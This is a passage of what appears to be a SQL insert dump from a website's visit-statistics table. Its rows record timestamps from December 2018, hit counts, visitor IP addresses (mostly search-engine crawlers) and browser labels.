255.117','other'),(357700,1545611081,2,2,0,0,'216.244.66.241','other'),(357701,1545611481,1,1,0,0,'157.55.39.59','other'),(357702,1545611603,1,1,0,0,'46.229.168.136','other'),(357703,1545611912,1,1,0,0,'109.201.154.211','other'),(357704,1545612094,1,1,0,0,'216.244.66.241','other'),(357705,1545612946,1,1,0,0,'185.220.102.8','other'),(357706,1545613167,1,1,0,0,'31.31.74.131','other'),(357707,1545613210,1,1,0,0,'157.55.39.227','other'),(357708,1545613235,1,1,0,0,'46.229.168.143','other'),(357709,1545613237,1,1,0,0,'46.229.168.145','other'),(357710,1545613518,3,3,0,0,'178.154.244.11','other'),(357711,1545613529,2,2,0,0,'5.45.207.19','other'),(357712,1545613604,1,1,0,0,'5.45.207.79','other'),(357713,1545613605,1,1,0,0,'66.249.66.59','chrome'),(357714,1545613606,1,1,0,0,'66.249.66.40','chrome'),(357715,1545614017,4,4,0,0,'216.244.66.241','other'),(357716,1545614151,1,1,0,0,'66.249.66.156','chrome'),(357717,1545614169,2,2,0,0,'66.249.66.152','chrome'),(357718,1545614286,2,2,0,0,'95.108.213.4','other'),(357719,1545614344,1,1,0,0,'66.249.66.154','chrome'),(357720,1545614676,1,1,0,0,'178.154.244.11','other'),(357721,1545614711,3,3,0,0,'5.45.207.19','other'),(357722,1545614872,1,1,0,0,'141.8.142.103','other'),(357723,1545615330,1,1,0,0,'5.45.207.79','other'),(357724,1545615655,1,1,0,0,'66.249.66.59','chrome'),(357726,1545615769,1,1,0,0,'46.229.168.133','other'),(357727,1545615770,1,1,0,0,'66.249.66.154','chrome'),(357728,1545616196,3,3,0,0,'66.249.66.152','chrome'),(357729,1545616538,2,2,0,0,'46.229.168.140','other'),(357730,1545616577,1,1,0,0,'46.229.168.129','other'),(357731,1545616751,1,1,0,0,'66.249.66.154','chrome'),(357732,1545616992,6,6,0,0,'216.244.66.241','other'),(357733,1545617122,1,1,0,0,'157.55.39.232','other'),(357734,1545617309,1,1,0,0,'46.229.168.144','other'),(357736,1545618294,1,1,0,0,'46.229.168.135','other'),(357737,1545618469,1,1,0,0,'8.29.198.25','other'),(357738,1545618675,2,2,0,0,'34.227.221.140','other'),(357739,1545618702,1,1,0,0,'216.244.66.241','other'),(357740,1545619059,1,1,0,0,'40.77.167.28','other'),(357741,1545619465,1,1,0,0,'8.29.198.25','other'),(357742,1545619730,1,1,0,0,'39.104.20.102','other'),(357743,1545620017,1,1,0,0,'95.163.255.108','other'),(357744,1545620102,2,2,0,0,'216.244.66.241','other'),(357745,1545620107,1,1,0,0,'95.163.255.119','other'),(357746,1545620319,2,2,0,0,'54.245.147.20','chrome'),(357747,1545620764,11,11,0,0,'34.227.221.140','other'),(357748,1545620830,2,2,0,0,'66.249.66.155','chrome'),(357749,1545620831,3,3,0,0,'66.249.66.154','chrome'),(357750,1545620906,2,2,0,0,'66.249.66.156','chrome'),(357751,1545621717,1,1,0,0,'46.229.168.146','other'),(357752,1545621850,1,1,0,0,'216.244.66.241','other'),(357753,1545622834,1,1,0,0,'46.229.168.137','other'),(357754,1545622836,1,1,0,0,'46.229.168.145','other'),(357755,1545622972,6,6,0,0,'216.244.66.241','other'),(357756,1545623217,1,1,0,0,'95.163.255.102','other'),(357757,1545623234,1,1,0,0,'95.163.255.116','other'),(357758,1545623340,1,1,0,0,'46.229.168.141','other'),(357759,1545624136,2,2,0,0,'91.196.178.135','firefox'),(357760,1545624306,1,1,0,0,'66.249.66.57','chrome'),(357761,1545624307,1,1,0,0,'66.249.66.44','chrome'),(357762,1545624320,2,2,0,0,'216.244.66.241','other'),(357763,1545624452,1,1,0,0,'46.229.168.135','other'),(357764,1545624514,3,3,0,0,'5.45.207.19','other'),(357765,1545624933,1,1,0,0,'178.154.244.11','other'),(357766,1545625120,1,1,0,0,'141.8.142.103','other'),(357767,1545625970,1,1,0,0,'46.229.168.149','other'),(357768,1545626076,2,2,0,0,'216.244.66.241','other'),(357769,1545626648,1,1,0,0,'46.229.168.152','other'),(357770,1545627312,1,1,0,0,'66.249.66.155','chrome'),(357771,1545627313,1,1,0,0,'66.249.66.156','chrome'),(357772,1545628304,1,1,0,0,'66.249.66.152','chrome'),(357773,1545629021,3,3,0,0,'216.244.66.241','other'),(357774,1545629303,1,1,0,0,'8.29.198.25','other'),(357775,1545629905,1,1,0,0,'66.249.66.152','chrome'),(357776,1545630298,1,1,0,0,'8.29.198.25','other'),(357777,1545630488,1,1,0,0,'66.249.66.156','chrome'),(357778,1545631742,1,1,0,0,'46.229.168.139','other'),(357779,1545631744,1,1,0,0,'46.229.168.133','other'),(357780,1545631898,3,3,0,0,'216.244.66.241','other'),(357781,1545632879,1,1,0,0,'216.244.66.241','other'),(357782,1545633555,1,1,0,0,'46.229.168.138','other'),(357783,1545633792,1,1,0,0,'216.244.66.241','other'),(357784,1545635186,5,5,0,0,'216.244.66.241','other'),(357785,1545635356,1,1,0,0,'66.249.66.155','chrome'),(357786,1545636401,1,1,0,0,'46.229.168.142','other'),(357787,1545636403,1,1,0,0,'46.229.168.130','other'),(357788,1545637298,2,2,0,0,'5.45.207.79','other'),(357789,1545637424,1,1,0,0,'5.45.207.19','other'),(357790,1545637482,1,1,0,0,'46.229.168.152','other'),(357791,1545637645,1,1,0,0,'95.163.255.104','other'),(357792,1545637760,1,1,0,0,'5.45.207.80','other'),(357793,1545637795,1,1,0,0,'5.255.253.38','other'),(357794,1545637813,1,1,0,0,'213.180.203.53','other'),(357795,1545637859,1,1,0,0,'37.9.113.103','other'),(357796,1545637867,1,1,0,0,'37.9.113.20','other'),(357797,1545637870,1,1,0,0,'95.108.181.54','other'),(357798,1545637873,1,1,0,0,'141.8.142.144','other'),(357799,1545637919,2,2,0,0,'178.154.244.11','other'),(357800,1545638011,1,1,0,0,'95.163.255.115','other'),(357801,1545638187,3,3,0,0,'216.244.66.241','other'),(357802,1545638200,1,1,0,0,'46.229.168.144','other'),(357803,1545638273,2,2,0,0,'66.249.66.156','chrome'),(357804,1545638294,2,2,0,0,'207.46.13.194','other'),(357805,1545638480,1,1,0,0,'213.180.203.48','other'),(357806,1545639109,1,1,0,0,'178.154.171.24','other'),(357807,1545639382,2,2,0,0,'178.154.200.48','other'),(357808,1545639400,1,1,0,0,'141.8.132.16','other'),(357809,1545639459,1,1,0,0,'66.249.66.155','chrome'),(357810,1545639460,1,1,0,0,'66.249.66.218','chrome'),(357811,1545639598,1,1,0,0,'37.9.113.38','other'),(357812,1545639704,1,1,0,0,'178.154.244.11','other'),(357813,1545639890,1,1,0,0,'46.229.168.144','other'),(357814,1545640141,1,1,0,0,'8.29.198.25','other'),(357815,1545640163,1,1,0,0,'95.108.213.4','other'),(357816,1545640394,1,1,0,0,'46.229.168.145','other'),(357817,1545640631,1,1,0,0,'5.45.207.76','other'),(357818,1545640845,1,1,0,0,'37.9.113.38','other'),(357819,1545640846,2,2,0,0,'157.55.39.177','other'),(357820,1545640911,1,1,0,0,'5.45.207.19','other'),(357821,1545641130,1,1,0,0,'8.29.198.26','other'),(357822,1545641158,1,1,0,0,'141.8.183.22','other'),(357823,1545641171,6,6,0,0,'216.244.66.241','other'),(357824,1545641310,1,1,0,0,'46.229.168.133','other'),(357825,1545641323,1,1,0,0,'213.180.203.53','other'),(357826,1545641340,1,1,0,0,'66.249.66.40','chrome'),(357827,1545641487,1,1,0,0,'46.229.168.147','other'),(357828,1545641550,1,1,0,0,'5.255.253.38','other'),(357829,1545641925,1,1,0,0,'178.154.200.48','other'),(357830,1545641939,1,1,0,0,'5.255.253.16','other'),(357831,1545641958,1,1,0,0,'207.46.13.168','other'),(357832,1545642028,1,1,0,0,'5.45.207.76','other'),(357833,1545642375,1,1,0,0,'207.46.13.175','other'),(357834,1545642413,1,1,0,0,'213.180.203.53','other'),(357835,1545642643,1,1,0,0,'66.249.66.157','chrome'),(357836,1545642644,1,1,0,0,'66.249.66.156','chrome'),(357837,1545643090,1,1,0,0,'13.66.139.0','other'),(357838,1545643328,2,2,0,0,'176.125.42.150','firefox'),(357839,1545643529,1,1,0,0,'46.229.168.150','other'),(357840,1545644069,1,1,0,0,'66.102.9.35','chrome'),(357841,1545644070,1,1,0,0,'85.232.147.155','chrome'),(357842,1545644098,5,5,0,0,'216.244.66.241','other'),(357843,1545644325,1,1,0,0,'66.249.66.152','chrome'),(357844,1545644607,1,1,0,0,'46.229.168.154','other'),(357845,1545645086,1,1,0,0,'207.46.13.139','other'),(357846,1545645201,1,1,0,0,'207.46.13.187','other'),(357847,1545645467,1,1,0,0,'46.229.168.136','other'),(357848,1545645659,1,1,0,0,'207.46.13.168','other'),(357849,1545645979,1,1,0,0,'157.55.39.152','other'),(357850,1545645993,1,1,0,0,'46.229.168.148','other'),(357851,1545646956,3,3,0,0,'216.244.66.241','other'),(357852,1545647106,1,1,0,0,'106.38.241.128','other'),(357853,1545647169,1,1,0,0,'95.152.44.66','chrome'),(357854,1545647421,1,1,0,0,'66.249.66.42','chrome'),(357855,1545648472,1,1,0,0,'66.249.66.155','chrome'),(357856,1545648474,1,1,0,0,'66.249.66.156','chrome'),(357857,1545648875,1,1,0,0,'46.229.168.146','other'),(357858,1545649116,2,2,0,0,'46.211.114.82','chrome'),(357859,1545649685,1,1,0,0,'66.249.66.59','chrome'),(357860,1545649687,1,1,0,0,'66.249.66.40','chrome'),(357861,1545649798,1,1,0,0,'66.249.66.155','chrome'),(357863,1545649910,3,3,0,0,'216.244.66.241','other'),(357864,1545649924,1,1,0,0,'5.255.253.16','other'),(357865,1545650183,1,1,0,0,'141.8.142.144','other'),(357866,1545650197,1,1,0,0,'46.229.168.153','other'),(357867,1545650367,2,2,0,0,'66.249.66.156','chrome'),(357868,1545650369,2,2,0,0,'66.249.66.152','chrome'),(357869,1545650760,1,1,0,0,'87.250.224.65','other'),(357870,1545650820,1,1,0,0,'37.9.113.38','other'),(357871,1545650862,1,1,0,0,'213.180.203.48','other'),(357872,1545650975,1,1,0,0,'8.29.198.26','other'),(357873,1545651013,2,2,0,0,'66.249.66.154','chrome'),(357874,1545651265,1,1,0,0,'46.229.168.129','other'),(357875,1545651399,3,3,0,0,'91.196.178.93','chrome'),(357876,1545651961,1,1,0,0,'8.29.198.27','other'),(357877,1545652119,1,1,0,0,'46.229.168.140','other'),(357878,1545652330,1,1,0,0,'46.229.168.150','other'),(357879,1545652332,1,1,0,0,'46.229.168.133','other'),(357880,1545652752,1,1,0,0,'37.187.134.60','other'),(357881,1545653003,3,3,0,0,'216.244.66.241','other'),(357882,1545653503,1,1,0,0,'66.249.66.154','chrome'),(357883,1545653736,1,1,0,0,'46.229.168.151','other'),(357884,1545654899,1,1,0,0,'216.244.66.241','other'),(357885,1545655947,2,2,0,0,'216.244.66.241','other'),(357886,1545656617,2,2,0,0,'176.125.42.150','firefox'),(357887,1545657031,2,2,0,0,'66.249.66.155','chrome'),(357888,1545657032,2,2,0,0,'66.249.66.152','chrome'),(357889,1545657054,2,2,0,0,'181.47.25.205','chrome'),(357890,1545657095,1,1,0,0,'95.163.255.161','other'),(357891,1545657173,1,1,0,0,'40.77.167.153','other'),(357892,1545657252,1,1,0,0,'46.229.168.133','other'),(357893,1545657567,3,3,0,0,'66.249.66.156','chrome'),(357894,1545658198,1,1,0,0,'46.229.168.150','other'),(357895,1545658657,1,1,0,0,'46.229.168.130','other'),(357896,1545658659,1,1,0,0,'46.229.168.147','other'),(357897,1545658678,1,1,0,0,'46.229.168.138','other'),(357898,1545658679,1,1,0,0,'46.229.168.129','other'),(357899,1545658715,4,4,0,0,'216.244.66.241','other'),(357900,1545660053,2,2,0,0,'216.244.66.241','other'),(357901,1545660331,1,1,0,0,'46.229.168.135','other'),(357902,1545660563,1,1,0,0,'66.249.66.57','chrome'),(357903,1545661625,6,6,0,0,'216.244.66.241','other'),(357904,1545661802,1,1,0,0,'8.29.198.25','other'),(357905,1545662339,1,1,0,0,'95.163.255.184','other'),(357906,1545662362,1,0,1,0,'66.249.66.59',''),(357907,1545662372,1,0,1,0,'66.249.66.40',''),(357908,1545662539,1,1,0,0,'95.163.255.159','other'),(357909,1545662585,1,1,0,0,'216.244.66.241','other'),(357910,1545662794,1,1,0,0,'8.29.198.25','other'),(357911,1545663885,1,1,0,0,'46.229.168.148','other'),(357912,1545664105,1,1,0,0,'95.108.213.4','other'),(357913,1545664752,4,4,0,0,'216.244.66.241','other'),(357914,1545665445,1,1,0,0,'46.229.168.143','other'),(357915,1545666451,1,1,0,0,'178.154.244.11','other'),(357916,1545667157,4,4,0,0,'42.112.28.157','firefox'),(357917,1545667547,1,1,0,0,'95.84.254.164','chrome'),(357918,1545667645,6,6,0,0,'216.244.66.241','other'),(357919,1545667662,1,1,0,0,'37.73.17.87','chrome'),(357920,1545667667,2,2,0,0,'66.249.83.216','chrome'),(357921,1545667674,1,1,0,0,'66.249.83.218','chrome'),(357922,1545667676,1,1,0,0,'66.249.83.220','chrome'),(357923,1545667710,1,1,0,0,'66.249.66.61','chrome'),(357924,1545667711,1,1,0,0,'66.249.66.44','chrome'),(357926,1545667857,1,1,0,0,'95.163.255.152','other'),(357927,1545667924,1,1,0,0,'95.163.255.156','other'),(357928,1545668415,1,1,0,0,'46.229.168.140','other'),(357929,1545669530,1,1,0,0,'176.14.253.156','msie'),(357930,1545670299,1,1,0,0,'46.229.168.152','other'),(357931,1545670301,1,1,0,0,'46.229.168.150','other'),(357932,1545670620,2,2,0,0,'216.244.66.241','other'),(357933,1545670759,1,1,0,0,'46.229.168.153','other'),(357934,1545670761,1,1,0,0,'46.229.168.149','other'),(357935,1545670819,1,1,0,0,'46.229.168.154','other'),(357936,1545670821,1,1,0,0,'46.229.168.138','other'),(357937,1545670827,1,1,0,0,'46.229.168.139','other'),(357938,1545670828,3,3,0,0,'46.229.168.147','other'),(357939,1545670851,1,1,0,0,'46.229.168.137','other'),(357940,1545671229,1,1,0,0,'46.229.168.141','other'),(357941,1545671230,1,1,0,0,'46.229.168.135','other'),(357942,1545672007,1,1,0,0,'46.229.168.140','other'),(357943,1545672009,1,1,0,0,'46.229.168.153','other'),(357944,1545672090,1,1,0,0,'46.229.168.151','other'),(357945,1545672091,2,2,0,0,'46.229.168.143','other'),(357946,1545672341,1,1,0,0,'46.229.168.129','other'),(357947,1545672498,1,1,0,0,'216.244.66.241','other'),(357948,1545672585,1,1,0,0,'66.249.66.61','chrome'),(357949,1545672586,1,1,0,0,'66.249.66.44','chrome'),(357950,1545672638,1,1,0,0,'8.29.198.25','other'),(357951,1545672860,2,2,0,0,'91.196.178.48','chrome'),(357952,1545673338,1,1,0,0,'95.163.255.99','other'),(357953,1545673341,1,1,0,0,'95.163.255.97','other'),(357954,1545673495,5,5,0,0,'216.244.66.241','other'),(357955,1545673539,1,1,0,0,'95.163.255.190','other'),(357956,1545673619,1,1,0,0,'8.29.198.25','other'),(357957,1545673752,1,1,0,0,'46.229.168.143','other'),(357958,1545673754,1,1,0,0,'46.229.168.140','other'),(357959,1545674400,1,1,0,0,'66.102.9.40','chrome'),(357960,1545674401,2,2,0,0,'91.196.178.186','chrome'),(357961,1545674512,1,1,0,0,'46.229.168.148','other'),(357962,1545674562,1,1,0,0,'46.229.168.154','other'),(357963,1545674583,1,1,0,0,'216.244.66.241','other'),(357964,1545674985,1,1,0,0,'66.249.66.40','chrome'),(357965,1545675035,2,2,0,0,'66.249.66.157','chrome'),(357966,1545675036,1,1,0,0,'66.249.66.156','chrome'),(357967,1545675255,1,1,0,0,'66.249.66.154','chrome'),(357968,1545675510,1,1,0,0,'46.229.168.144','other'),(357969,1545675528,2,2,0,0,'46.229.168.137','other'),(357970,1545675812,1,1,0,0,'46.229.168.149','other'),(357971,1545675913,1,1,0,0,'46.229.168.150','other'),(357972,1545676615,4,4,0,0,'216.244.66.241','other'),(357973,1545677450,1,1,0,0,'66.249.66.155','chrome'),(357975,1545677453,1,1,0,0,'66.249.66.156','chrome'),(357976,1545677817,1,1,0,0,'46.211.71.28','chrome'),(357977,1545677883,1,1,0,0,'216.244.66.241','other'),(357978,1545678087,14,14,0,0,'5.189.159.208','other'),(357979,1545678151,7,7,0,0,'204.12.226.26','other'),(357980,1545678776,1,1,0,0,'46.229.168.142','other'),(357981,1545678829,1,1,0,0,'95.163.255.162','other'),(357982,1545678832,1,1,0,0,'95.163.255.176','other'),(357983,1545678965,1,1,0,0,'95.163.255.155','other'),(357984,1545678966,1,1,0,0,'95.163.255.94','other'),(357985,1545679398,1,1,0,0,'178.154.244.11','other'),(357986,1545679470,1,1,0,0,'37.9.113.20','other'),(357987,1545679573,1,1,0,0,'46.229.168.149','other'),(357988,1545679575,1,1,0,0,'46.229.168.150','other'),(357989,1545679637,2,2,0,0,'216.244.66.241','other'),(357990,1545679807,1,1,0,0,'37.9.113.103','other'),(357991,1545679954,3,3,0,0,'141.8.142.103','other'),(357992,1545680010,1,1,0,0,'87.250.224.65','other'),(357993,1545680066,2,2,0,0,'95.108.213.4','other'),(357994,1545680076,2,2,0,0,'37.9.113.148','other'),(357995,1545680117,1,1,0,0,'141.8.142.108','other'),(357996,1545680215,1,1,0,0,'213.180.203.9','other'),(357997,1545680362,17,17,0,0,'178.154.244.11','other'),(357998,1545680446,15,15,0,0,'5.45.207.19','other'),(357999,1545680464,2,2,0,0,'87.250.224.47','other'),(358000,1545680807,13,13,0,0,'5.45.207.79','other'),(358001,1545680986,7,7,0,0,'141.8.142.103','other'),(358002,1545681016,3,3,0,0,'95.108.213.4','other'),(358003,1545681018,1,1,0,0,'37.9.113.148','other'),(358004,1545681341,11,11,0,0,'178.154.244.11','other'),(358005,1545681357,10,10,0,0,'5.45.207.19','other'),(358006,1545681561,2,2,0,0,'91.196.178.131','firefox'),(358007,1545681851,5,5,0,0,'87.250.224.47','other'),(358008,1545681874,1,1,0,0,'5.255.253.38','other'),(358009,1545681897,1,1,0,0,'46.229.168.142','other'),(358010,1545681910,4,4,0,0,'5.45.207.79','other'),(358011,1545682042,2,2,0,0,'95.108.213.4','other'),(358012,1545682067,1,1,0,0,'37.9.113.148','other'),(358013,1545682178,1,1,0,0,'141.8.142.103','other'),(358014,1545682369,3,3,0,0,'216.244.66.241','other'),(358015,1545682408,3,3,0,0,'178.154.244.11','other'),(358016,1545682525,2,2,0,0,'78.159.62.22','firefox'),(358017,1545682545,1,1,0,0,'46.229.168.153','other'),(358018,1545683037,1,1,0,0,'207.46.13.222','other'),(358019,1545683193,1,1,0,0,'157.55.39.59','other'),(358020,1545683241,1,1,0,0,'5.45.207.79','other'),(358021,1545683273,1,1,0,0,'207.46.13.39','other'),(358022,1545683300,1,1,0,0,'5.45.207.19','other'),(358023,1545683434,2,2,0,0,'216.244.66.241','other'),(358024,1545683468,1,1,0,0,'8.29.198.26','other'),(358025,1545683518,1,1,0,0,'141.8.142.103','other'),(358026,1545683742,1,1,0,0,'87.250.224.47','other'),(358027,1545683830,1,1,0,0,'95.108.213.4','other'),(358028,1545684040,1,1,0,0,'66.249.66.155','chrome'),(358029,1545684041,1,1,0,0,'66.249.66.152','chrome'),(358030,1545684442,1,1,0,0,'8.29.198.26','other'),(358031,1545684487,1,1,0,0,'95.163.255.153','other'),(358032,1545685598,3,3,0,0,'216.244.66.241','other'),(358033,1545685835,1,1,0,0,'46.229.168.145','other'),(358034,1545685884,1,1,0,0,'46.229.168.154','other'),(358035,1545686521,1,1,0,0,'216.244.66.241','other'),(358036,1545687040,1,1,0,0,'157.55.39.53','other'),(358037,1545687773,1,1,0,0,'46.229.168.136','other'),(358038,1545687958,1,1,0,0,'95.163.255.67','other'),(358039,1545687961,1,1,0,0,'95.163.255.68','other'),(358040,1545688325,1,1,0,0,'87.250.224.64','other'),(358041,1545688510,1,1,0,0,'46.229.168.138','other'),(358042,1545688587,3,3,0,0,'216.244.66.241','other'),(358043,1545688995,1,1,0,0,'78.111.190.207','chrome'),(358044,1545689056,2,2,0,0,'157.55.39.109','other'),(358045,1545689251,1,1,0,0,'40.77.167.42','other'),(358046,1545689605,1,1,0,0,'216.244.66.241','other'),(358047,1545690036,1,1,0,0,'95.163.255.175','other'),(358048,1545690952,1,1,0,0,'209.17.96.234','other'),(358049,1545691098,1,1,0,0,'46.229.168.141','other'),(358050,1545691099,1,1,0,0,'46.229.168.133','other'),(358051,1545691105,1,1,0,0,'40.77.167.48','other'),(358052,1545691374,2,2,0,0,'46.229.168.132','other'),(358053,1545691376,2,2,0,0,'46.229.168.144','other'),(358054,1545691391,6,6,0,0,'216.244.66.241','other'),(358055,1545692097,1,1,0,0,'46.229.168.148','other'),(358056,1545692344,3,3,0,0,'130.180.216.227','chrome'),(358057,1545693462,1,1,0,0,'130.180.216.227','chrome'),(358058,1545693564,1,1,0,0,'180.76.15.159','other'),(358059,1545693565,1,1,0,0,'180.76.15.19','other'),(358060,1545694053,1,1,0,0,'66.249.66.152','chrome'),(358061,1545694223,1,1,0,0,'78.111.185.200','chrome'),(358062,1545694226,5,5,0,0,'178.154.244.11','other'),(358063,1545694264,4,4,0,0,'5.45.207.79','other'),(358065,1545694299,1,1,0,0,'8.29.198.26','other'),(358066,1545694302,4,4,0,0,'216.244.66.241','other'),(358067,1545694309,1,1,0,0,'207.46.13.32','other'),(358068,1545694310,4,4,0,0,'141.8.142.103','other'),(358069,1545694441,3,3,0,0,'5.45.207.19','other'),(358070,1545694472,2,2,0,0,'5.45.207.8','other'),(358071,1545694475,1,1,0,0,'178.154.171.17','other'),(358072,1545694477,1,1,0,0,'141.8.142.144','other'),(358073,1545694639,1,1,0,0,'95.108.181.75','other'),(358074,1545694641,1,1,0,0,'37.9.113.103','other'),(358075,1545695083,1,1,0,0,'95.108.213.4','other'),(358076,1545695265,1,1,0,0,'8.29.198.26','other'),(358077,1545695379,1,1,0,0,'216.244.66.241','other'),(358078,1545695857,1,1,0,0,'207.46.13.37','other'),(358079,1545695903,1,1,0,0,'95.163.255.95','other'),(358080,1545696554,1,1,0,0,'46.229.168.129','other'),(358081,1545697555,4,4,0,0,'216.244.66.241','other'),(358082,1545697629,2,2,0,0,'207.46.13.208','other'),(358083,1545698236,1,1,0,0,'141.8.142.108','other'),(358084,1545698315,1,1,0,0,'180.76.15.33','other'),(358085,1545698316,1,1,0,0,'180.76.15.143','other'),(358086,1545699314,1,1,0,0,'37.218.245.25','other'),(358087,1545699379,1,1,0,0,'216.244.66.241','other'),(358088,1545699488,2,2,0,0,'136.243.37.219','other'),(358089,1545700168,1,1,0,0,'207.46.13.32','other'),(358090,1545700476,1,1,0,0,'207.46.13.208','other'),(358091,1545700561,2,2,0,0,'216.244.66.241','other'),(358092,1545700736,1,1,0,0,'207.46.13.37','other'),(358093,1545700888,1,1,0,0,'46.229.168.140','other'),(358094,1545701082,1,1,0,0,'66.249.66.42','chrome'),(358095,1545701562,1,1,0,0,'157.55.39.155','other'),(358096,1545702227,1,1,0,0,'95.163.255.102','other'),(358097,1545702289,1,1,0,0,'95.163.255.113','other'),(358098,1545702315,1,1,0,0,'180.76.15.149','other'),(358099,1545702316,1,1,0,0,'180.76.15.34','other'),(358100,1545703022,1,1,0,0,'40.77.167.58','other'),(358101,1545703046,1,1,0,0,'46.229.168.152','other'),(358102,1545703624,2,2,0,0,'216.244.66.241','other'),(358103,1545704383,1,1,0,0,'46.229.168.132','other'),(358104,1545705026,5,5,0,0,'5.45.207.79','other'),(358105,1545705118,5,5,0,0,'5.45.207.19','other'),(358106,1545705132,1,1,0,0,'8.29.198.27','other'),(358107,1545705249,3,3,0,0,'178.154.244.11','other'),(358108,1545705266,1,1,0,0,'87.250.224.65','other'),(358109,1545705678,5,5,0,0,'141.8.142.103','other'),(358110,1545705808,3,3,0,0,'95.108.213.4','other'),(358111,1545705833,1,1,0,0,'66.249.66.44','chrome'),(358112,1545705865,1,1,0,0,'207.46.13.37','other'),(358113,1545705883,2,2,0,0,'40.77.167.58','other'),(358114,1545706082,9,9,0,0,'5.45.207.19','other'),(358115,1545706090,1,1,0,0,'8.29.198.26','other'),(358116,1545706111,7,7,0,0,'5.45.207.79','other'),(358117,1545706289,6,6,0,0,'178.154.244.11','other'),(358118,1545706616,5,5,0,0,'216.244.66.241','other'),(358119,1545706659,1,1,0,0,'46.229.168.142','other'),(358120,1545706768,1,1,0,0,'46.229.168.139','other'),(358121,1545706912,1,1,0,0,'95.163.255.155','other'),(358122,1545706915,1,1,0,0,'95.163.255.185','other'),(358123,1545707051,1,1,0,0,'66.249.66.156','chrome'),(358124,1545707108,1,1,0,0,'46.229.168.152','other'),(358125,1545707111,1,1,0,0,'46.229.168.144','other'),(358126,1545707241,1,1,0,0,'95.163.255.95','other'),(358127,1545707255,1,1,0,0,'95.163.255.94','other'),(358128,1545707256,1,1,0,0,'95.163.255.96','other'),(358129,1545707349,2,2,0,0,'5.45.207.19','other'),(358130,1545707351,2,2,0,0,'46.211.50.105','chrome'),(358131,1545707549,1,1,0,0,'141.8.142.103','other'),(358132,1545707682,1,1,0,0,'46.229.168.150','other'),(358133,1545708149,1,1,0,0,'157.55.39.76','other'),(358134,1545708220,1,1,0,0,'66.249.66.156','chrome'),(358135,1545708246,1,1,0,0,'95.163.255.104','other'),(358136,1545708272,2,2,0,0,'40.77.167.58','other'),(358137,1545708475,1,1,0,0,'46.229.168.136','other'),(358138,1545709219,2,2,0,0,'207.46.13.37','other'),(358139,1545709668,2,2,0,0,'216.244.66.241','other'),(358140,1545709681,2,2,0,0,'40.77.167.58','other'),(358141,1545710268,1,1,0,0,'95.163.255.115','other'),(358142,1545710396,2,2,0,0,'95.163.255.114','other'),(358143,1545710519,1,1,0,0,'95.163.255.112','other'),(358144,1545710595,1,1,0,0,'40.77.167.58','other'),(358145,1545710800,4,4,0,0,'40.77.167.202','other'),(358146,1545710820,1,1,0,0,'95.163.255.119','other'),(358147,1545710881,1,1,0,0,'216.244.66.241','other'),(358148,1545710935,1,1,0,0,'95.163.255.109','other'),(358149,1545711554,2,2,0,0,'95.163.255.165','other'),(358150,1545711761,1,1,0,0,'46.229.168.141','other'),(358151,1545711904,1,1,0,0,'95.163.255.177','other'),(358152,1545711999,1,1,0,0,'40.77.167.58','other'),(358153,1545712341,2,2,0,0,'157.55.39.76','other'),(358154,1545712361,2,0,2,0,'188.109.126.224',''),(358155,1545712470,3,3,0,0,'216.244.66.241','other'),(358156,1545712859,1,1,0,0,'95.163.255.96','other'),(358157,1545712969,1,1,0,0,'40.77.167.70','other'),(358158,1545713166,1,1,0,0,'207.46.13.162','other'),(358159,1545713168,1,1,0,0,'66.249.66.152','chrome'),(358160,1545713259,1,1,0,0,'40.77.167.58','other'),(358161,1545713333,1,1,0,0,'95.163.255.109','other'),(358162,1545713540,1,1,0,0,'95.163.255.103','other'),(358163,1545713619,1,1,0,0,'46.229.168.132','other'),(358164,1545713677,1,1,0,0,'95.163.255.112','other'),(358165,1545713686,1,1,0,0,'95.163.255.104','other'),(358166,1545713875,2,2,0,0,'216.244.66.241','other'),(358167,1545714013,111,111,0,0,'204.12.197.234','other'),(358168,1545714393,2,2,0,0,'91.196.178.176','chrome'),(358169,1545714841,1,1,0,0,'207.46.13.37','other'),(358170,1545714845,2,2,0,0,'66.249.66.156','chrome'),(358171,1545714914,113,113,0,0,'204.12.197.234','other'),(358172,1545715448,2,2,0,0,'54.245.39.159','chrome'),(358173,1545715707,2,2,0,0,'216.244.66.241','other'),(358174,1545715973,1,1,0,0,'8.29.198.25','other'),(358175,1545716451,1,1,0,0,'157.55.39.119','other'),(358176,1545716897,1,1,0,0,'95.163.255.109','other'),(358177,1545716903,1,1,0,0,'95.163.255.103','other'),(358178,1545716932,1,1,0,0,'8.29.198.27','other'),(358179,1545717011,2,2,0,0,'216.244.66.241','other'),(358180,1545717013,1,1,0,0,'95.163.255.186','other'),(358181,1545717241,1,1,0,0,'95.163.255.189','other'),(358182,1545717428,1,1,0,0,'87.250.224.47','other'),(358183,1545717440,1,1,0,0,'178.154.244.11','other'),(358184,1545717464,1,1,0,0,'95.163.255.172','other'),(358185,1545717529,1,1,0,0,'95.163.255.153','other'),(358186,1545717605,2,2,0,0,'40.77.167.125','other'),(358187,1545717627,1,1,0,0,'46.229.168.129','other'),(358188,1545717740,1,1,0,0,'95.163.255.154','other'),(358189,1545717767,1,1,0,0,'5.45.207.19','other'),(358190,1545718027,1,1,0,0,'40.77.167.207','other'),(358191,1545718196,1,1,0,0,'95.108.213.4','other'),(358192,1545718571,6,6,0,0,'216.244.66.241','other'),(358193,1545718789,1,1,0,0,'46.229.168.150','other'),(358194,1545718791,1,1,0,0,'46.229.168.145','other'),(358195,1545719429,1,1,0,0,'66.249.66.157','chrome'),(358196,1545719451,1,1,0,0,'40.77.167.58','other'),(358197,1545719456,3,3,0,0,'66.249.66.154','chrome'),(358198,1545719523,1,1,0,0,'66.249.66.156','chrome'),(358199,1545719600,1,1,0,0,'66.249.66.155','chrome'),(358200,1545719724,1,1,0,0,'46.229.168.141','other'),(358201,1545720194,1,1,0,0,'66.249.66.44','chrome'),(358202,1545720327,1,1,0,0,'216.244.66.241','other'),(358203,1545720448,1,1,0,0,'66.249.66.157','chrome'),(358204,1545720475,1,1,0,0,'66.249.66.152','chrome'),(358205,1545720828,2,2,0,0,'46.229.168.135','other'),(358206,1545720877,2,2,0,0,'66.249.66.57','chrome'),(358207,1545720907,2,2,0,0,'66.249.66.40','chrome'),(358208,1545721300,2,2,0,0,'66.249.66.156','chrome'),(358209,1545721306,1,1,0,0,'66.249.66.155','chrome'),(358210,1545721327,2,2,0,0,'66.249.66.154','chrome'),(358211,1545721633,3,3,0,0,'66.249.66.59','chrome'),(358212,1545721659,2,2,0,0,'66.249.66.42','chrome'),(358213,1545721854,1,1,0,0,'216.244.66.241','other'),(358214,1545721872,1,1,0,0,'40.77.167.122','other'),(358215,1545721938,2,2,0,0,'66.249.66.57','ch